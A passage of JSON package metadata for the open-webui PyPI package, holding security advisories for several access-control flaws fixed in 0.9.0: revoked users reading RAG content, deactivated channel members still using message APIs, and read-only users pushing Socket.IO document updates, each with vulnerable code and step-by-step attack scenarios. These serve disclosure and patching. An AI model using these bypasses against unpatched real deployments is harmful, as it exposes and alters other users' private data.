knowledge bases.\n\n## Impact\n\n- Access revocation is ineffective for RAG content — users who previously had access can continue extracting file and knowledge base content indefinitely\n- Private document content can be systematically extracted through targeted queries\n- Breaks the access control model for files and knowledge bases at the RAG layer\n\n## Preconditions\n\n- Attacker must know the file ID or knowledge base ID (UUID) of the target resource\n- The target file/knowledge base must have been processed into the vector store\n- Attacker must have a valid user account","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-08T20:03:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-h36f-rqpx-j5wx","https://nvd.nist.gov/vuln/detail/CVE-2026-44560","https://github.com/advisories/GHSA-h36f-rqpx-j5wx"],"source_kind":"github","identifiers":["GHSA-h36f-rqpx-j5wx","CVE-2026-44560"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-08T21:00:08.527Z","updated_at":"2026-09-03T03:03:18.756Z","epss_percentage":0.00366,"epss_percentile":0.29504,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMzZmLXJxcHgtajV3eM4ABWf-","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oMzZmLXJxcHgtajV3eM4ABWf-","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMzZmLXJxcHgtajV3eM4ABWf-/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1obWdyLTY3aHctajJjcc4ABWf9","url":"https://github.com/advisories/GHSA-hmgr-67hw-j2cq","title":"Open WebUI: Deactivated Channel Members Retain Full Access to Group/DM Channels","description":"# Deactivated Channel Members Retain Full Access to Group/DM Channels\n\n## Affected Component\n\nChannel membership authorization check:\n- `backend/open_webui/models/channels.py` (lines 663-673, `is_user_channel_member`)\n- Used at 15 locations in `backend/open_webui/routers/channels.py`\n\n## Affected Versions\n\nCurrent main branch (commit `6fdd19bf1`) and likely all versions with the group/DM channel feature.\n\n## Description\n\nThe `is_user_channel_member` function checks whether a `ChannelMember` row exists but does not check the `is_active` field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with `is_active=False` and `status='left'`. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls.\n\nThe channel correctly disappears from the deactivated user's channel list (the listing query at `get_channels_by_user_id` properly filters on `is_active`), but all 15 message-level endpoints in the router rely on `is_user_channel_member` for authorization, which does not filter on `is_active`.\n\n```python\n# models/channels.py:663 — missing is_active check\ndef is_user_channel_member(self, channel_id, user_id, db=None):\n    membership = db.query(ChannelMember).filter(\n        ChannelMember.channel_id == channel_id,\n        ChannelMember.user_id == user_id,\n    ).first()\n    return membership is not None  # True even when is_active=False\n```\n\nCompare with `get_channel_by_id_and_user_id` (line 778) which correctly checks `ChannelMember.is_active.is_(True)`.\n\n## CVSS 3.1 Breakdown\n\n| Metric | Value | Rationale |\n|--------|-------|-----------|\n| Attack Vector | Network (N) | Exploited remotely via API calls |\n| Attack Complexity | Low (L) | No special conditions beyond knowing the channel ID (which the user had as a former member) |\n| Privileges Required | Low (L) | Requires a valid user account and prior channel membership |\n| User Interaction | None (N) | No victim interaction required |\n| Scope | Unchanged (U) | Impact is within the same authorization boundary (the channel) |\n| Confidentiality | Low (L) | Can read messages in a channel the user should no longer access |\n| Integrity | Low (L) | Can post, edit, and delete messages in the channel |\n| Availability | None (N) | No denial of service |\n\n## Attack Scenario\n\n1. User A and User B are members of a private group channel.\n2. The channel owner removes User B (or User B leaves). User B's membership is set to `is_active=False, status='left'`.\n3. The channel disappears from User B's UI — but User B noted the channel ID while they were a member.\n4. User B calls the API directly:\n   - `GET /api/v1/channels/{channel_id}/messages` — reads all messages, including those posted after deactivation\n   - `POST /api/v1/channels/{channel_id}/messages/post` — posts new messages\n   - `POST /api/v1/channels/{channel_id}/messages/{id}/update` — edits messages\n   - `DELETE /api/v1/channels/{channel_id}/messages/{id}/delete` — deletes messages\n5. All requests succeed because `is_user_channel_member` returns `True`.\n\n## Impact\n\n- Deactivated users can continue reading all new messages posted after their removal (confidentiality breach)\n- Deactivated users can post, edit, and delete messages (integrity breach)\n- The deactivation mechanism provides a false sense of security — channel owners believe removed users have lost access\n\n## Preconditions\n\n- Channels feature must be enabled (disabled by default)\n- Attacker must have a valid user account\n- Attacker must have been a member of the channel at some point (and thus knows the channel ID)\n\n## Recommended Fix\n\nAdd `is_active` filtering to `is_user_channel_member`:\n\n```python\ndef is_user_channel_member(self, channel_id, user_id, db=None):\n    membership = db.query(ChannelMember).filter(\n        ChannelMember.channel_id == channel_id,\n        ChannelMember.user_id == user_id,\n        ChannelMember.is_active.is_(True),\n    ).first()\n    return membership is not None\n```\n\nThis aligns it with the existing `get_channel_by_id_and_user_id` method which already applies this filter correctly.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-08T20:01:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq","https://nvd.nist.gov/vuln/detail/CVE-2026-44561","https://github.com/advisories/GHSA-hmgr-67hw-j2cq"],"source_kind":"github","identifiers":["GHSA-hmgr-67hw-j2cq","CVE-2026-44561"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-08T21:00:08.527Z","updated_at":"2026-09-03T03:03:18.757Z","epss_percentage":0.00178,"epss_percentile":0.0738,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWdyLTY3aHctajJjcc4ABWf9","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1obWdyLTY3aHctajJjcc4ABWf9","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWdyLTY3aHctajJjcc4ABWf9/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cmZoLXJqNHEtcm1ocs4ABWf8","url":"https://github.com/advisories/GHSA-vrfh-rj4q-rmhr","title":"Read-Only Open WebUI Users Can Modify Collaborative Documents via Socket.IO","description":"# Read-Only Users Can Modify Collaborative Documents via Socket.IO\n\n## Affected Component\n\nSocket.IO collaborative document editing handler:\n- `backend/open_webui/socket/main.py` (lines 667-721, `ydoc:document:update` handler)\n\n## Affected Versions\n\nCurrent main branch and likely all versions with collaborative note editing.\n\n## Description\n\nThe `ydoc:document:update` Socket.IO event handler checks whether the sender is a member of the document's Socket.IO room (line 678) but does not verify that the sender has **write** permission. Users with read-only access join the document room via `ydoc:document:join`, which only requires `read` permission (line 520). Once in the room, the user can emit `ydoc:document:update` events that modify the in-memory Yjs document state and are broadcast to all other collaborators in real time.\n\nThe `document_save_handler` (line 600) correctly checks `write` permission before persisting to the database, so the attacker cannot directly save changes. However, the tampered content is visible to all collaborators, and if any user with write access saves the document, the injected content is persisted.\n\n```python\n# ydoc:document:update handler (line 667) — only checks room membership, not write permission\nasync def on_document_update(sid, data):\n    document_id = normalize_document_id(data.get('document_id', ''))\n    # ...\n    room = f'doc_{document_id}'\n    if room not in sio.rooms(sid):  # Room membership check only\n        return\n    # Applies update to Yjs state and broadcasts to all users\n    YDOC_MANAGER.apply_update(document_id, update)\n    await sio.emit('ydoc:document:update', {...}, room=room, skip_sid=sid)\n```\n\nCompare with `ydoc:document:join` (line 520) which checks permission:\n\n```python\n# Only checks READ permission — so read-only users join the room\nif not has_access(user_id, type, id, 'read', db=db):\n    return\n```\n\n## CVSS 3.1 Breakdown\n\n| Metric | Value | Rationale |\n|--------|-------|-----------|\n| Attack Vector | Network (N) | Exploited remotely via Socket.IO events |\n| Attack Complexity | Low (L) | No special conditions; attacker emits a standard Socket.IO event |\n| Privileges Required | Low (L) | Requires a valid user account with read access to the shared note |\n| User Interaction | None (N) | Modifications appear in real time without victim action; however, persistence requires a write-access user to save |\n| Scope | Unchanged (U) | Impact is within the collaborative document context |\n| Confidentiality | None (N) | No data disclosure beyond what read access already provides |\n| Integrity | Low (L) | In-memory document state is modified and broadcast; persistence is indirect (requires another user to save) |\n| Availability | Low (L) | Collaborative editing session can be disrupted with invalid content |\n\n## Attack Scenario\n\n1. User A creates a note and shares it with User B with **read** permission.\n2. User B opens the note, which triggers `ydoc:document:join` — the server checks read permission and adds User B to the document room.\n3. User B emits `ydoc:document:update` with a crafted Yjs update payload via the Socket.IO connection (bypassing any frontend read-only enforcement).\n4. The server applies the update to the Yjs document state and broadcasts it to all collaborators.\n5. User A sees the injected content appear in their editor in real time.\n6. If User A saves the document (intentionally or via autosave), the tampered content is persisted to the database — User A's save passes the write permission check since User A is the owner.\n\n## Impact\n\n- Read-only users can inject, modify, or delete content in collaborative documents\n- Modifications are broadcast in real time to all collaborators, causing confusion or disruption\n- If a write-access user saves (including autosave), the tampered content is permanently persisted\n- Undermines the read/write permission model for collaborative editing\n\n## Preconditions\n\n- Attacker must have a valid user account with read access to a shared note\n- The note must be open for collaborative editing (at least one other user viewing it, or the attacker can wait for a write-access user to open and save)\n\n## Consolidation\n\nThis advisory covers read-only users modifying collaborative notes over Socket.IO. Two handlers were affected, both fixed in v0.9.0:\n\n- `ydoc:document:update` — checked only room membership, not write permission, so a read-only collaborator could inject in-memory document updates broadcast to other collaborators (persistence indirect). @Classic298.\n- `document_save_handler` — checked `permission='read'` while persisting via `Notes.update_note_by_id`, so a read-only collaborator could persist note changes directly. Reported by @hacnho \n\nOne CVE for the consolidated advisory.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-08T20:00:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-vrfh-rj4q-rmhr","https://nvd.nist.gov/vuln/detail/CVE-2026-44564","https://github.com/advisories/GHSA-vrfh-rj4q-rmhr"],"source_kind":"github","identifiers":["GHSA-vrfh-rj4q-rmhr","CVE-2026-44564"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-08T21:00:08.527Z","updated_at":"2026-09-03T03:03:18.757Z","epss_percentage":0.0022,"epss_percentile":0.12302,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cmZoLXJqNHEtcm1ocs4ABWf8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cmZoLXJqNHEtcm1ocs4ABWf8","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cmZoLXJqNHEtcm1ocs4ABWf8/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/open-webui","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/open-webui","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/open-webui/dependencies","status":null,"funding_links":["https://github.com/sponsors/open-webui"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T19:00:26.316Z","issues_count":5574,"pull_requests_count":5137,"avg_time_to_close_issue":789760.6515837105,"avg_time_to_close_pull_request":416863.0681063123,"issues_closed_count":2210,"pull_requests_closed_count":4214,"pull_request_authors_count":1366,"issue_authors_count":3600,"avg_comments_per_issue":1.0256548259777538,"avg_comments_per_pull_request":1.1660502238660697,"merged_pull_requests_count":2411,"bot_issues_count":2,"bot_pull_requests_count":306,"past_year_issues_count":416,"past_year_pull_requests_count":565,"past_year_avg_time_to_close_issue":866383.5763546798,"past_year_avg_time_to_close_pull_request":1342913.857142857,"past_year_issues_closed_count":203,"past_year_pull_requests_closed_count":378,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":300,"past_year_avg_comments_per_issue":2.6971153846153846,"past_year_avg_comments_per_pull_request":1.3044247787610619,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":25,"past_year_merged_pull_requests_count":108,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/issues","maintainers":[{"login":"silentoplayz","count":208,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"Classic298","count":134,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"dannyl1u","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dannyl1u"},{"login":"Silentoplayz","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Silentoplayz"},{"login":"justinh-rahb","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinh-rahb"},{"login":"ayanahye","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ayanahye"},{"login":"jackthgu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jackthgu"},{"login":"andrewbbaek","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"bdsumon4u","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bdsumon4u"},{"login":"matgla","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matgla"},{"login":"byg1004","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byg1004"},{"login":"GryBsh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GryBsh"},{"login":"pagoru","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pagoru"},{"login":"mohswell","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mohswell"},{"login":"MickWang","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MickWang"}],"active_maintainers":[{"login":"Classic298","count":134,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"silentoplayz","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"andrewbbaek","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/open-webui/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/open-webui/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/open-webui/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/open-webui/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/open-webui/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/open-webui/codemeta","maintainers":[{"uuid":"open-webui","login":"open-webui","name":null,"email":null,"url":null,"packages_count":9,"html_url":"https://pypi.org/user/open-webui/","role":null,"created_at":"2024-05-22T04:06:01.399Z","updated_at":"2024-05-22T04:06:01.399Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/open-webui/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":932733,"maintainers_count":400865,"namespaces_count":0,"keywords_count":313568,"github":"pypi","metadata":{"funded_packages_count":59273,"rate_limit":2},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-09-03T05:01:57.989Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}}]